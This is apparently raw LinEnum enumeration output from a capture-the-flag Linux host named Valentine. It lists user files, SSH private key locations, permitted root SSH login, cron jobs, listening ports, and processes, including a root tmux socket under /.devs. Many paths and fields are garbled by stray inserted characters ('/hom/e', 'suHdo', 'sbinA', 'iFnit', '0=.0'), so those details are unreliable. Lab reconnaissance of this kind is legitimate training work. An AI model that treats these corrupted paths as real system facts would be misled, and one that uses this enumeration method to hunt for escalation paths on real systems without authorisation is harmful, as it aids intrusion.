/home/hype/.cache/indicator-appmenu/hud-usage-log.sqlite -rw-rw-r-- 1 hype hype 1978 Dec 11 2017 /home/hype/.cache/unity/migration_script.log -rw-r--r-- 1 hype hype 0 Dec 11 2017 /home/hype/.cache/motd.legal-displayed -rw-rw-r-- 1 hype hype 71 Dec 11 2017 /home/h-ype/.cache/indicators/messages/seen-db.keyfile -rw-r--r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.cache/event-sound-cache.tdb.c9052f1b76300a5447f46cc700000004.x86_64-pc-linux-gnu -rw-r--r-- 1 hype hype 26 Dec 11 2017 /home/hype/.dmrc -rw-rw-r-- 1 hype hype 5 Dec 11 2017 /home/hype/.config/user-dirs.locale -rw-rw-r-- 1 hype hype 1152 Dec 11 2017 /home/hype/.config/dconf/user 
-rw-rw-r-- 1 hype hype 97 Dec 11 2017 /home/hype/.config/nautilus/desktop-metadata -rw-rw-r-- 1 hype hype 3031 Dec 11 2017 /home/hype/.config/Trolltech.conf -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseB -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.DB -rw-rw-r-- 1 hype hype 28 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/iamchert -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position..DB -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.DB -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/flintlock -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseA -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.DB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseB -rw-r--r-- 1 hype hype 19456 Dec 11 2017 /home/hype/.local/share/webkit/icondatabase/WebpageIcons.db -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /hom/e/hype/.local/share/.converted-launchers -rw-rw-r-- 1 hype hype 835 Dec 11 2017 /home/hype/.local/share/gsettings-data-convert -rw-r--r-- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/id_rsa.pub -rw-r--r-- 1 root root 39 Dec 13 2017 /home/hype/.tmux.conf -rw-r--r-- 1 hype hype 696 Dec 11 2017 
/home/hype/.pulse/c9052f1b76300a5447f46cc700000004-card-database.tdb -rw-r--r-- 1 hype hype 12288 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-device-volumes.tdb -rw-r--r-- 1 hype hype 10 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-sink -rw-r--r-- 1 hype hype 18 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-source -rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-stream-volumes.tdb -rw-rw-r-- 1 hype hype 132 Dec 11 2017 /home/hype/.gtk-bookmarks -rw-rw-r-- 1 hype hype 17179 Aug 27 15:12 /home/hype/Desktop/output.txt -rwxrwxr-x 1 hype hype 46631 Jul 13 11:54 /home/hype/Desktop/LinEnum.sh -rw-rw-r-- 1 hype hype 33 Dec 13 2017 /home/hype/Desktop/user.txt -rw-rw-r-- 1 hype hype 463 Dec 11 2017 /home/hype/.dbus/session-bus/c9052f1b76300a5447f46cc700000004-0 -rw-r--r-- 1 hype hype 3486 Dec 11 2017 /home/hype/.bashrc [-] Home directory contents: total 144K drwxr-xr-x 21 hype hype 4.0K Feb 5 2018 . drwxr-xr-x 3 root root 4.0K Dec 11 2017 .. 
-rw------- 1 hype hype 131 Feb 16 2018 .bash_history -rw-r--r-- 1 hype hype 220 Dec 11 2017 .bash_logout -rw-r--r-- 1 hype hype 3.5K Dec 11 2017 .bashrc drwx------ 11 hype hype 4.0K Dec 11 2017 .cache drwx------ 9 hype hype 4.0K Dec 11 2017 .config drwx------ 3 hype hype 4.0K Dec 11 2017 .dbus drwxr-xr-x 2 hype hype 4.0K Aug 27 15:12 Desktop -rw-r--r-- 1 hype hype 26 Dec 11 2017 .dmrc drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Documents drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Downloads drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 .fontconfig drwx------ 3 hype hype 4.0K Dec 11 2017 .gconf drwx------ 4 hype hype 4.0K Dec 11 2017 .gnome2 -rw-rw-r-- 1 hype hype 132 Dec 11 2017 .gtk-bookmarks drwx------ 2 hype hype 4.0K Dec 11 2017 .gvfs -rw------- 1 hype hype 636 Dec 11 2017 .ICEauthority drwxr-xr-x 3 hype hype 4.0K Dec 11 2017 .local drwx------ 3 hype hype 4.0K Dec 11 2017 .mission-control drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Music drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Pictures -rw-r--r-- 1 hype hype 675 Dec 11 2017 .profile drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Public drwx------ 2 hype hype 4.0K Dec 11 2017 .pulse -rw------- 1 hype hype 256 Dec 11 2017 .pulse-cookie drwx------ 2 hype hype 4.0K Dec 13 2017 .ssh drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Templates -rw-r--r-- 1 root root 39 Dec 13 2017 .tmux.conf drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Videos -rw------- 1 hype hype 0 Dec 11 2017 .Xauthority -rw------- 1 hype hype 12K Dec 11 2017 .xsession-errors -rw------- 1 hype hype 9.5K Dec 11 2017 .xsession-errors.old [-] SSH keys/host information found in the following locations: -rw------- 1 hype hype 1766 Dec 13 2017 /home/hype/.ssh/id_rsa -rw------- 1 hype hype 222 Dec 13 2017 /home/hype/.ssh/known_hosts -rw-r--r-- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/id_rsa.pub -rw------- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/authorized_keys [-] Root is allowed to login via SSH: PermitRootLogin yes ### ENVIRONMENTAL ####################################### [-] 
Environment information: SHELL=/bin/bash TERM=xterm-256color XDG_SESSION_COOKIE=c9052f1b76300a5447f46cc700000004-1598566069.27898-907383351 SSH_CLIENT=10.10.14.7 47922 22 SSH_TTY=/dev/pts/0 USER=hype PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games MAIL=/var/mail/hype PWD=/home/hype/Desktop LANG=en_US.UTF-8 HOME=/home/hype SHLVL=2 LOGNAME=hype SSH_CONNECTION=10.10.14.7 47922 10.10.10.79 22 LESSOPEN=| /usr/bin/lesspipe %s LESSCLOSE=/usr/bin/lesspipe %s %s _=/usr/bin/env [-] Path information: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games drwxr-xr-x 2 root root 4096 Dec 11 2017 /bin drwxr-xr-x 2 root root 4096 Feb 16 2018 /sbin drwxr-xr-x 2 root root 36864 Feb 16 2018 /usr/bin drwxr-xr-x 2 root root 4096 Apr 25 2012 /usr/games drwxr-xr-x 2 root root 4096 Apr 25 2012 /usr/local/bin drwxr-xr-x 2 root root 4096 Apr 25 2012 /usr/local/sbin drwxr-xr-x 2 root root 12288 Feb 16 2018 /usr/sbin [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash /usr/bin/tmux [-] Current umask value: 0002 u=rwx,g=rwx,o=rx [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Apr 2 2012 /etc/crontab /etc/cron.d: total 28 drwxr-xr-x 2 root root 4096 Dec 11 2017 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rw-r--r-- 1 root root 288 Jun 20 2010 anacron -rw-r--r-- 1 root root 544 Feb 13 2017 php5 -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder /etc/cron.daily: total 84 drwxr-xr-x 2 root root 4096 Dec 11 2017 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. 
-rwxr-xr-x 1 root root 311 Jun 20 2010 0anacron -rwxr-xr-x 1 root root 633 Jul 15 2016 apache2 -rwxr-xr-x 1 root root 219 Apr 10 2012 apport -rwxr-xr-x 1 root root 15399 Apr 20 2012 apt -rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils -rwxr-xr-x 1 root root 256 Apr 12 2012 dpkg -rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate -rwxr-xr-x 1 root root 1365 Mar 31 2012 man-db -rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate -rwxr-xr-x 1 root root 249 Apr 8 2012 passwd -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder -rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest -rwxr-xr-x 1 root root 2947 Apr 2 2012 standard -rwxr-xr-x 1 root root 214 Apr 19 2012 update-notifier-common /etc/cron.hourly: total 20 drwxr-xr-x 2 root root 4096 Apr 25 2012 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder /etc/cron.monthly: total 24 drwxr-xr-x 2 root root 4096 Apr 25 2012 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rwxr-xr-x 1 root root 313 Jun 20 2010 0anacron -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder /etc/cron.weekly: total 32 drwxr-xr-x 2 root root 4096 Apr 25 2012 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rwxr-xr-x 1 root root 312 Jun 20 2010 0anacron -rwxr-xr-x 1 root root 730 Dec 30 2011 apt-xapian-index -rwxr-xr-x 1 root root 907 Mar 31 2012 man-db -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. 
SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Anacron jobs and associated file permissions: -rw-r--r-- 1 root root 395 Jun 20 2010 /etc/anacrontab # /etc/anacrontab: configuration file for anacron # See anacron(8) and anacrontab(5) for details. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # These replace cron's entries 1 5 cron.daily nice run-parts --report /etc/cron.daily 7 10 cron.weekly nice run-parts --report /etc/cron.weekly @monthly 15 cron.monthly nice run-parts --report /etc/cron.monthly [-] When were jobs last executed (/var/spool/anacron contents): total 20 drwxr-xr-x 2 root root 4096 Dec 11 2017 . drwxr-xr-x 8 root root 4096 Apr 25 2012 .. 
-rw------- 1 root root 9 Aug 27 14:43 cron.daily -rw------- 1 root root 9 Aug 27 14:43 cron.monthly -rw------- 1 root root 9 Aug 27 14:43 cron.weekly ### NETWORKING ########################################## [-] Network and IP info: eth0 Link encap:Ethernet HWaddr 00:50:56:b9:d0:09 inet addr:10.10.10.79 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: dead:beef::b881:fd57:25a3:d78f/64 Scope:Global inet6 addr: dead:beef::250:56ff:feb9:d009/64 Scope:Global inet6 addr: fe80::250:56ff:feb9:d009/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:599284 errors:0 dropped:0 overruns:0 frame:0 TX packets:420050 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:99816521 (99.8 MB) TX bytes:100816041 (100.8 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:745 errors:0 dropped:0 overruns:0 frame:0 TX packets:745 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:142703 (142.7 KB) TX bytes:142703 (142.7 KB) [-] ARP history: ? 
(10.10.10.2) at 00:50:56:b9:f9:ab [ether] on eth0 [-] Nameserver(s): nameserver 8.8.8.8 [-] Default route: default 10.10.10.2 0.0.0.0 UG 100 0 0 eth0 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* 9 LISTEN - tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 ::1:631 :::* LISTEN - tcp6 0 0 :::443 :::* LISTEN - [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:55806 0.0.0.0:* - udp 0 0 0.0.0.0:5353 0.0.0.0:* - udp6 0 0 :::48082 :::* - udp6 0 0 :::5353 : :::* - ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 24508 2420 ? Ss 14:11 0:00 /sbin/init root 2 0.0 0.0 0 0 ? S 14:11 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 14:11 0:01 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? S 14:11 0:01 [kworker/0:0] root 5 0.0 0.0 0 0 ? S 14:11 0:00 [kworker/u:0] root 6 0.0 0.0 0 0 ? S 14:11 0:00 [migration/0] root 7 0.0 0.0 0 0 ? S 14:11 0:00 [watchdog/0] root 8 0.0 0.0 0 0 ? S< 14:11 0:00 [cpuset] root 9 0.0 0.0 0 0 ? S< 14:11 0:00 [khelper] root 10 0.0 0.0 0 0 ? S 14:11; 0:00 [kdevtmpfs] root 11 0.0 0.0 0 0 ? S< 14:11 0:00 [netns] root 12 0.0 0.0 0 0 ? S 14:11 0:00 [sync_supers] root 13 0.0 0.0 0 0 ? S 14:11 0:00 [bdi-default] root 14 0.0 0.0 0 0 ? S< 14:11 0:00 [kintegrityd] root 15 0.0 0.0 0 0 ? S< 14:11 0:00 [kblockd] root 16 0.0 0.0 0 0 ? S< 14:11 0:00 [ata_sff] root 17 0.0 0.0 0 0 ? S 14:11 0:00 [khubd] root 18 0.0 0.0 0 0 ? S< 14:11 0:00 [md] root 19 0.0 0.0 0 0 ? S 14:11 0:00 [kworker/u:1] root 21 0.0 0.0 0 0 ? S 14:11 0:00 [khungtaskd] root 22 0.0 0.0 0 0 ? S 14:11 0:00 [kswapd0] root 23 0.0 0.0 0 0 ? SN 14:11 0:00 [ksmd] root 24 0.0 0.0 0 0 ? SN 14:11 0:00 <[khugepaged] root 25 0.0 0.0 0 0 ? 
S 14:11 0:00 [fsnotify_mark] root 26 0.0 0.0 0 0 ? S 14:11 0:00 [ecryptfs-kthrea] root 27 0.0 0.0 0 0 ? S< 14:11 0:00 [crypto] root 35 0.0 0.0 0 0 ? S< 14:11 0:00 [kthrotld] root 37 0.0 0.0 0 0 ? S 14:11 0:00 [scsi_eh_0] root 38 0.0 0.0 0 0 ? S 14:11 0:00 [scsi_eh_1] root 60 0.0 0.0 0 0 ? S< 14:11 0:00 [devfreq_wq] root 161 0.0 0.0 0 0 ? S 14:11 0:00 [scsi_eh_2] root 164 0.0 0.0 0 0 ? S< 14:11 0:00 [vmw_pvscsi_wq_2] root 218 0.0 0.0 0 0 ? S 14:11 0:00 [jbd2/sda1-8] root 219 0.0 0.0 0 0 ? S< 14:11 0:00 [ext4-dio-unwrit] root 303 0.0 0.0 17356 636 ? S 14:11 0:00 upstart-udev-bridge --daemon root 310 0=.0 0.1 21876 1676 ? Ss 14:11 0:00 /sbin/udevd --daemon syslog 491 0.0 0.1 249464 1540 ? Sl 14:11 0:00 rsyslogd -c5 root 524 0.0 0.1 21872 1204 ? S 14:11 0:00 /sbin/udevd --daemon root 525 0.0 0.1 21872 1156 ? S 14:11 0:00 /sbin/udevd --daemon 102 528 0.0 0.1 24076 1260 ? Ss 14:11 0:00 dbus-daemon --system --fork --activation=upstart root 552 0.0 0.3 79036 3204 ? Ss 14:11 0:00 /usr/sbin/modem-manager root 563 0.0 0.1 21180 1716 ? Ss 14:11 0:00 /usr/sbin/bluetoothd avahi 572 0.0 0.1 32300 1788 ? S 14:11 0:00 avahi-daemon: running [Valentine.local] avahi 573 0.0 0.0 32172 468 ? S 14:11 0:00 avahi-daemon: chroot helper root 579 0.0 0.0 0 0 ? S< 14:11 0:00 [krfcommd] root 580 0.0 0.3 104088 3804 ? Ss 14:11 0:00 /usr/sbin/cupsd -F root 586 0.0 0.6 174440 6516 ? > Ssl 14:11 0:00 NetworkManager root 599 0.0 0.3 203500 3896 ? Sl 14:11 0:00 /usr/lib/policykit-1/polkitd --no-debug root 604 0.0 0.0 0 0 ? S< 14:11 0:00 [kpsmoused] root 704 0.0 0.0 15180 392 ? S 14:11 0:00 upstart-socket-bridge --daemon root 847 0.0 0.0 0 0 ? S 14:11 0:00 [flush-8:0] root 903 0.0 0.2 49952 2860 ? Ss 14:11 0:00 /usr/sbin/sshd -D root 992 0.0 0.0 19976 976 tty4 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty4 root 1001 0.0 0.0 19976 972 tty5 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty5 root 1005 0.0 0.1 26416 1676 ? 
Ss 14:11 0:01 /usr/bin/tmux -S /.devs/dev_sess <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<&l?t;<<<<<< root 1009 0.0 0.4 20652 4584 pts/13 Ss+ 14:11 0:00 -bash root 1018 0.0 0.0 19976 968 tty2 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty2 root 1021 0.0 0.0 19976 976 tty3 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty3 root 1023 0.0 0.0 19976 972 tty6 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty6 root 1048 0.0 0.0 4452 820 ? Ss 14:11 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket root 1050 0.0 0.1 19104 1036 ? Ss 14:11 0:00 cron whoopsie 1052 0.0 0.4 202412 4856 ? Ssl 14:11 0:00 whoopsie daemon 1053 0.0 0.0 16900 380 ? Ss 14:11 0:00 atd root 1089 0.0 0.4 162284 4320 ? Sl 14:11 0:02 /usr/bin/vmtoolsd root 1227 0.0 1.0 113124 10972 ? Ss 14:11 0:00 /usr/sbin/apache2 -k start root 1439 0.0 0.0 19976 976 tty1 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty1 root 1592 0.0@ 1.0 66916 10296 ? S 14:11 0:00 /usr/lib/vmware-vgauth/VGAuthService -s root 1627 0.0 0.5 510124 5468 ? Sl 14:11 0:01 //usr/lib/vmware-caf/pme/bin/ManagementAgentHost www-data 1965 0.3 0.8 113900 8808 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1966 0.3 0.8 113900 8692 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1969 0.3 0.8 113900 8848 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1970 0.3 0.8 113900 8816 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1971 0.3 0.8 113900 8692 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1972 0.3 0.8 113900 8824 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1973 0.3 0.8 113900 8832 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1974 0.3 0.8 113900 8840 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1981 0.3 0.8 113900 8684 ? S 14:43 0:05 /usr/sbinA/apache2 -k start www-data 2437 0.2 0.8 113900 8768 ? S 14:52 0:03 /usr/sbin/apache2 -k start root 2470 0.0 0.0 0 0 ? S 15:06 0:00 [kworker/0:2] root 2473 0.0 0.3 92220 3972 ? Ss 15:07 0:00 sshd: hype [priv] root 2476 0.0 0.3 584296 3828 ? 
Sl 15:07 0:00 /usr/sbin/console-kit-daemon --no-daemon hype 2684 0.0 0.1 92220 1668 ? S 15:07 0:00 sshd: hype@pts/0 hype 2685 0.0 0.8 31640 8752 pts/0 Ss 15:07 0:00 -bash root 2805 0.0 0.0 0 0 ? S 15:11 0:00 [kworker/0:1] hype 2814 0.0 0.1 17080 1976 pts/0 S+ 15:12 0:00 /bin/bash ./LinEnum.sh -t hype 2815 0.0 0.1 17212 1648 pts/0 S+ 15:12 0:00 /bin/bash ./LinEnum.sh -t hype 2816 0.0 0.0 11356 664 pts/0 S+ 15:12 0:00 tee -a hype 3219 0.0 0.1 17212 1328 pts/0 S+ 15:13 0:00 /bin/bash ./LinEnum.sh -t hype 3220 0.0 0.1 22352 1276 pts/0 B R+ 15:13 0:00 ps aux [-] Process binaries and associated permissions (from above list): 936K -rwxr-xr-x 1 root root 933K Apr 3 2012 /bin/bash 32K -rwxr-xr-x 1 root root 32K Mar 29 2012 /sbin/getty 160K -rwxr-xr-x 1 root root 160K Apr 16 2012 /sbin/init 136K -rwxr-xr-x 1 root root 135K Apr 5 2012 /sbin/udevd 416K -rwxr-xr-x 1 root root 413K Feb 13 2012 /usr/bin/tmux 44K -rwxr-xr-x 1 root root 44K Dec 2 2015 /usr/bin/vmtoolsd 16K -rwxr-xr-x 1 root root 15K Jan 6 2012 /usr/lib/policykit-1/polkitd 784K -rwxr-xr-x 4 root root 783K Dec 11 2017 //usr/lib/vmware-caf/pme/bin/ManagementAgentHost 0 lrwxrwxrwx 1 root root 37 Dec 11 2017 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin64/appLoader 0 lrwxrwxrwx 1 root root 34 Jul 15 2016 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2 856K -rwxr-xr-x 1 root root 856K Mar 21 2012 /usr/sbin/bluetoothd 144K -rwxr-xr-x 1 root root 141K Feb 25 2012 /usr/sbin/console-kit-daemon 436K -rwxr-xr-xC 1 root root 434K Apr 9 2012 /usr/sbin/cupsd 388K -rwxr-xr-x 1 root root 388K Mar 24 2012 /usr/sbin/modem-manager 508K -rwxr-xr-x 1 root root 505K Aug 11 2016 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 196 drwxr-xr-x 2 root root 4096 Feb 16 2018 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. 
lrwxrwxrwx 1 root root 21 Dec 11 2017 acpid -> /lib/init/upstart-job -rwxr-xr-x 1 root root 652 Jan 4 2010 acpi-support lrwxrwxrwx 1 root root 21 Dec 11 2017 alsa-restore -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 alsa-store -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 anacron -> /lib/init/upstart-job -rwxr-xr-x 1 root root 7621 Feb 6 2012 apache2 -rwxr-xr-x 1 root root 4596 Apr 12 2012 apparmor lrwxrwxrwx 1 root root 21 Dec 11 2017 apport -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 atd -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 Davahi-daemon -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 bluetooth -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2444 Apr 14 2012 bootlogd -rwxr-xr-x 1 root root 2125 Mar 1 2011 brltty lrwxrwxrwx 1 root root 21 Dec 11 2017 console-setup -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 cron -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 cups -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 dbus -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 dmesg -> /lib/init/upstart-job -rwxr-xr-x 1 root root 1242 Dec 13 2011 dns-clean lrwxrwxrwx 1 root root 21 Dec 11 2017 failsafe-x -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 friendly-recovery -> /lib/init/upstart-job -rwxr-xr-x 1 root root 1105 Apr 17 2012 grub-common -rwxr-xr-x 1 root root 1329 Apr 14 2012 halt lrwxrwxrwx 1 root root 21 Dec 11 2017 hostname -> /lib/inEit/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 hwclock -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 hwclock-save -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 irqbalance -> /lib/init/upstart-job -rwxr-xr-x 1 root root 1893 Apr 18 2012 kerneloops -rwxr-xr-x 1 root root 1293 Apr 14 2012 killprocs -rw-r--r-- 1 root root 0 Apr 25 2012 .legacy-bootordering lrwxrwxrwx 1 root root 21 Dec 11 2017 lightdm -> /lib/init/upstart-job 
lrwxrwxrwx 1 root root 21 Dec 11 2017 modemmanager -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 module-init-tools -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2797 Feb 13 2012 networking lrwxrwxrwx 1 root root 21 Dec 11 2017 network-interface -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 network-interface-container -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 network-interface-security -> /lib/iFnit/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 network-manager -> /lib/init/upstart-job -rwxr-xr-x 1 root root 882 Apr 14 2012 ondemand -rwxr-xr-x 1 root root 1685 Jan 24 2012 open-vm-tools lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth-log -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth-splash -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth-stop -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth-upstart-bridge -> /lib/init/upstart-job -rwxr-xr-x 1 root root 561 Feb 4 2011 pppd-dns lrwxrwxrwx 1 root root 21 Dec 11 2017 procps -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2180 Apr 11 2012 pulseaudio -rwxr-xr-x 1 root root 8635 Apr 14 2012 rc -rwxr-xr-x 1 root root 801 Apr 14 2012 rc.local -rwxr-xr-x 1 root root 117 Apr 14 2012 rcS -rw-r--r-- 1 root root 2427 AprG 14 2012 README -rwxr-xr-x 1 root root 639 Apr 14 2012 reboot lrwxrwxrwx 1 root root 21 Dec 11 2017 resolvconf -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 rfkill-restore -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 rfkill-store -> /lib/init/upstart-job -rwxr-xr-x 1 root root 4395 Nov 8 2011 rsync lrwxrwxrwx 1 root root 21 Dec 11 2017 rsyslog -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2344 Dec 4 2011 saned -rwxr-xr-x 1 root root 4321 Apr 14 2012 sendsigs lrwxrwxrwx 1 root root 21 Dec 11 2017 setvtrgb -> /lib/init/upstart-job -rwxr-xr-x 1 root root 590 Apr 14 2012 single 
-rw-r--r-- 1 root root 4304 Apr 14 2012 skeleton -rwxr-xr-x 1 root root 2107 May 15 2011 speech-dispatcher -rwxr-xr-x 1 root root 4371 Aug 11 2016 ssh -rwxr-xr-x 1 root root 567 Apr 14 2012 stop-bootlogd -rwxr-xr-x 1 root root 1143 Apr 14 2012 stop-bootlogd-single -rwxr-xr-x 1 root root 700 Oct 26 2011 suHdo srw-rw---- 1 root root 0 Dec 13 2017 test -rwxr-xr-x 1 root root 409 Dec 13 2017 tmuxer lrwxrwxrwx 1 root root 21 Dec 11 2017 udev -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 udev-fallback-graphics -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 udev-finish -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 udevmonitor -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 udevtrigger -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 ufw -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2800 Apr 14 2012 umountfs -rwxr-xr-x 1 root root 2211 Apr 14 2012 umountnfs.sh 